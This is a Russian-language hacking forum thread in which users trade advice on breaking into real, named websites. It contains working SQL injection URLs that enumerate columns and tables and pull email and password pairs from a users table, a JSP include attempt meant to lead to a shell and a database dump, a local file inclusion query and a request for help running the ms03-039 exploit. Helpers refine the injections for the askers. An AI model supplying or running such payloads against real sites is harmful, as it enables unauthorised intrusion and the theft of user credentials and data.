
09.01.2010, 01:22
|
|
Новичок
Регистрация: 25.01.2009
Сообщений: 3
С нами:
9100947
Репутация:
1
|
|
JSP XSS взлом
У меня такой вопрос, т.к. я в JSP exploiting неочень пока щарю, но учусь...
сайт: JSP (J2EE) (AJAX)
сервер: Apache Tomcat 5.0.28 с Coyote Connector
уязвимость: XSS, поле позволяет максимум 80 символов.
конечная цель: добраться до данных BD (dump)
пром. цель: залить/подключить что-то вроде шелла (есть ли для JSP нормальные? *), или слить оригиналы jsp страниц, чтоб посмотреть как обращение к BD идет.
какой самый оптимальный способ воспользоваться.
мои варианты:
1. Include, так чтоб на сайт ничего не заливать, чтоб следов поменьше было.
Код:
<jsp:include page="{HttpServletRequest().getParameter("xx")}" />
в хх подставил удаленный HTML. Чето не работает ((
Что посоветуете?
Update:
* Нашел неплохой JSP File Browser
http://www.vonloesch.de/jspbrowser.html
Последний раз редактировалось ccleverr; 09.01.2010 в 01:43..
|
|
|

09.01.2010, 16:00
|
|
Познающий
Регистрация: 10.08.2009
Сообщений: 30
С нами:
8816961
Репутация:
4
|
|
народ подскажите плз, как такое может быть
Код:
_ttp://flashg amest udio.com/flash_games/flash_games.php?id=17+GROUP+BY+15/*
Код:
_ttp://flas hgames tudio.com/flash_games/flash_games.php?id=17+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*
почему не подходит?
|
|
|

09.01.2010, 16:20
|
|
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
С нами:
9428066
Репутация:
1668
|
|
Сообщение от Gidz
народ подскажите плз, как такое может быть
Код:
_ttp://flashg amest udio.com/flash_games/flash_games.php?id=17+GROUP+BY+15/*
Код:
_ttp://flas hgames tudio.com/flash_games/flash_games.php?id=17+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*
почему не подходит?
все подходит, выводи в 3 поле..и смотри сорец страницы
Код:
<title>Flash Game Studio : 4.0.27-standard</title>
|
|
|

09.01.2010, 16:23
|
|
Познающий
Регистрация: 10.08.2009
Сообщений: 30
С нами:
8816961
Репутация:
4
|
|
Сообщение от RulleR
все подходит, выводи в 3 поле..и смотри сорец страницы
Код:
<title>Flash Game Studio : 4.0.27-standard</title>
ага выводит, а я на странице искал, сенкс 
|
|
|

10.01.2010, 00:55
|
|
Познающий
Регистрация: 10.08.2009
Сообщений: 30
С нами:
8816961
Репутация:
4
|
|
хелп, подскажите плз, что-то не могу понять опять, подставлял во все столбцы, но что-то ничего не отображается.. ((
пробовал кодировать/декодировать, шифровать.. но вродеж он и без этого должен цифры отображать нормально?
пробовал хексить слово и потом по коду искать, но тоже ни как..
Код:
_ttp://www.asian ewsnet.net/news.php?id=-60+union+select+1,2,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*
зы И еще на другом сайте пробую просмотреть таблицы, так показывает таблицу
Код:
?id=-11+union+select+1,2,3,table_name,5,6,7,8,9,10,11,12+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+29,1+--+
но почему-то не могу к ней подключиться, ошибку пишет
Код:
?id=-11+union+select+1,2,3,4,5,6,7,8,9,10,11,12+from+tablename+--+
Последний раз редактировалось Gidz; 10.01.2010 в 02:45..
|
|
|

10.01.2010, 09:27
|
|
Познающий
Регистрация: 24.04.2007
Сообщений: 92
С нами:
10025299
Репутация:
412
|
|
маф
Сообщение от Gidz
хелп, подскажите плз, что-то не могу понять опять, подставлял во все столбцы, но что-то ничего не отображается.. ((
пробовал кодировать/декодировать, шифровать.. но вродеж он и без этого должен цифры отображать нормально?
пробовал хексить слово и потом по коду искать, но тоже ни как..
туц
asianewsnet.net/news.php?id=999999999999+union+select+1,2,3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*-+&sec=2
зы И еще на другом сайте пробую просмотреть таблицы, так показывает таблицу
Код:
?id=-11+union+select+1,2,3,table_name,5,6,7,8,9,10,11,12+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+29,1+--+
но почему-то не могу к ней подключиться, ошибку пишет
Код:
?id=-11+union+select+1,2,3,4,5,6,7,8,9,10,11,12+from+tablename+--+
[/QUOTE]
Возможно скрипт работает с другой БД.Укажите в запросе имя БД
Код:
-11+union+select+1,2,3,4,5,6,7,8,9,10,11,12+from+database.tablename+--+
Имя базы данных:
Код:
-11+union+select+1,2,3,concat_ws(0x3a,table_name,table_schema),5,6,7,8,9,10,11,12+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+29,1+--+
Зы:Может не хватать прав на доступ
Последний раз редактировалось S00pY; 10.01.2010 в 09:32..
|
|
|

11.01.2010, 11:18
|
|
Познающий
Регистрация: 10.08.2009
Сообщений: 30
С нами:
8816961
Репутация:
4
|
|
Сообщение от S00pY
туц
Код:
asianewsnet.net/news.php?id=999999999999+union+select+1,2,3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 /*-+&sec=2
Возможно скрипт работает с другой БД.Укажите в запросе имя БД
Код:
-11+union+select+1,2,3,4,5,6,7,8,9,10,11,12+from+database.tablename+--+
Имя базы данных:
Код:
-11+union+select+1,2,3,concat_ws(0x3a,table_name,table_schema),5,6,7,8,9,10,11,12+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+29,1+--+
Зы:Может не хватать прав на доступ
спасибо) А можно немного по подробней, из=за чего не отображалось с "-" а с "999999999999" заработало? и что означает "-+&sec=2"?
____________________________________
И еще я сюда напишу сразу, может кто подскажет, я тут перечитываю заново некоторые статьи, например вот в этой https://forum.antichat.ru/thread19844.html написано,
По моим последним наблюдениям до 80% веб ресурсов сети подвержены подобным атакам
как искать подобного рода уязвимости? почти все статьи что я читаю указывают параметр "?id=" и дальше пробовать подставлять разные значения, но тоесть получается не обязательно нужен "?id=" ? но и любой параметр подойдет, например встречал "?int=" "?e=" "?i=" , с ними также пробовать подставлять, или вообще на сайте (в урле) искать любое числовое значение и пробовать менять и подставлять к нему данные?
Последний раз редактировалось Gidz; 11.01.2010 в 11:21..
|
|
|

11.01.2010, 15:22
|
|
Познающий
Регистрация: 21.07.2007
Сообщений: 68
С нами:
9898501
Репутация:
257
|
|
Сообщение от Gidz
спасибо) А можно немного по подробней, из=за чего не отображалось с "-" а с "999999999999" заработало? и что означает "-+&sec=2"?
____________________________________
И еще я сюда напишу сразу, может кто подскажет, я тут перечитываю заново некоторые статьи, например вот в этой https://forum.antichat.ru/thread19844.html написано, как искать подобного рода уязвимости? почти все статьи что я читаю указывают параметр "?id=" и дальше пробовать подставлять разные значения, но тоесть получается не обязательно нужен "?id=" ? но и любой параметр подойдет, например встречал "?int=" "?e=" "?i=" , с ними также пробовать подставлять, или вообще на сайте (в урле) искать любое числовое значение и пробовать менять и подставлять к нему данные?
Помоему просто мусор. Можно так.
http://asiane wsnet.net/news.php?id=1+union+select+1,2,3,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24/*
На счёт второго вопроса, можно и с id=, и с int= и e=, это просто другие названия переменных и не более...Моё имхо, лучше для начала сделать простенький сайтец, php+mysql+ещё что-то), желательно с нуля, после чего тебе будет всё более понятней и интересней. Ествественно в ходе создания сайта, в теории ты выучишь хотя php и mysql.. Потому как сразу без какого-то рабочего опыта, будет сложновато.
Сообщение от FaTRuS
http://clean.kz/index.php?act=
Выдает ошибку Warning: main(/home/clean/data/public_html/modules/.php)
можно ли произвести локальный инклуд
И еще как узнать название всех таблиц в sql 4.1.25
Так как там magic_quotes_gpc=on, то нулем не заменишь, разве что через /////////[...].
Последний раз редактировалось v1d0qz; 11.01.2010 в 15:54..
|
|
|

10.01.2010, 01:17
|
|
Banned
Регистрация: 07.01.2010
Сообщений: 132
С нами:
8602094
Репутация:
8
|
|
вопрос по скулю:
Цитата:
+and+(select+top+1+isnull(cast([email]+as+nvarchar(4000)),char(32))%2bchar(94)%2bisnull( cast([password]+as+nvarchar(4000)),char(32))+from+[jackson]..[users]+where+email+not+in+(select+top+1+email+from+[jackson]..[users]+where+1=1+order+by+[email])+)%3E0--
тут выводится в ответе email@domain.com^passmy
Возможно ли сделать запрос чтобы выдавало не email@domain.com^passmy
а !!!email@domain.com^passmy!!!
Тоесть надо добавит 0x212121 в начало и конец каждого ответа
это чтоб со страницы корректно спарсит нужно
|
|
|

10.01.2010, 11:26
|
|
Познающий
Регистрация: 16.04.2009
Сообщений: 81
С нами:
8984365
Репутация:
45
|
|
Намекните где можно почитать, как заюзать ms03-039 и есть ли он в метасплойте. Ато в мс я его не нашел (3,2), скачал скомпилированую версию, а как заюзать хз. В cmd выдает: usage 1.exe <target_ip>
Что дальше?
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|